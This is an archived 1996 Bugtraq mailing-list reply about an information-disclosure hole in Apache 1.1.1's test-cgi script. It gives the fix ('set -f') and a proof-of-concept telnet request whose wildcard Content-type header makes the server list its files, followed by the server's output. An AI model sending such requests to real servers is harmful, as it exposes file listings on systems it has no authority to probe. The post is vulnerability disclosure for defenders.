[3737] in bugtraq
Re: Vulnerability in test-cgi
daemon@ATHENA.MIT.EDU (Joe Zbiciak)
Wed Dec 4 12:52:08 1996
X-Apparently-From: "Not Your Average Joe [tm]" <im14u2c@cegt201.bradley.edu>
X-Apparently-To: You@Wherever.You.Are
Date: Tue, 3 Dec 1996 22:17:18 -0600
Reply-To: Joe Zbiciak <im14u2c@cegt201.bradley.edu>
From: Joe Zbiciak <im14u2c@cegt201.bradley.edu>
X-To: era@ucar.edu
To: Multiple recipients of list BUGTRAQ <BUGTRAQ@NETSPACE.ORG>
In-Reply-To: <199612031928.MAA07296@niwot.scd.ucar.EDU> from "Ed Arnold" at
Dec 3, 96 12:28:22 pm
And then Ed Arnold went and said something like this:
|
|Another data point for anyone out there running Apache ... test-cgi
|in the apache-1.1.1 distribution already has the required
|
|echo QUERY_STRING = "$QUERY_STRING"
|
However, it does not have the necessary quotes around the "$CONTENT_TYPE"
string. Therefore it's still vulnerable in it's default configuration.
Adding "set -f" as the second line of the script closes the hole completely.
(www) frankenstein:~$ (echo POST /cgi-bin/test-cgi HTTP/1.0; echo Content-type: \* ; echo Content-length: 0; echo; sleep 5) | telnet localhost 80
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
HTTP/1.0 200 OK
Date: Wed, 04 Dec 1996 04:11:15 GMT
Server: Apache/1.1.1
Content-type: text/plain
CGI/1.0 test script report:
argc is 0. argv is .
SERVER_SOFTWARE = Apache/1.1.1
SERVER_NAME = frankenstein.asylum.net
GATEWAY_INTERFACE = CGI/1.1
SERVER_PROTOCOL = HTTP/1.0
SERVER_PORT = 80
REQUEST_METHOD = POST
HTTP_ACCEPT =
PATH_INFO =
PATH_TRANSLATED =
SCRIPT_NAME = /cgi-bin/test-cgi
QUERY_STRING =
REMOTE_HOST = localhost
REMOTE_ADDR = 127.0.0.1
REMOTE_USER =
AUTH_TYPE =
CONTENT_TYPE = (bunch of files listed here, whose names I don't care to share)
CONTENT_LENGTH = 0
Connection closed by foreign host.
(www) frankenstein:~$
--
:======= Joe Zbiciak =======: Bonehead Quotes of 1992 (5 of 14)
:- - im14u2c@bradley.edu - -:"Until recently the word facist was considered
: - - - - - http: - - - - - : shameful. Fortunately that time has passed.
://ee1.bradley.edu/~im14u2c/: In fact, there is now a reassessment of how
:======= DISCLAIMER: =======: much Grandpa Benito did for Italy."
: It's all right... - - -- -- Alessandra Mussolini, announcing her plan
-- - - I didn't do it! : to run for parliament as a neofascist
(462:834 11:15)
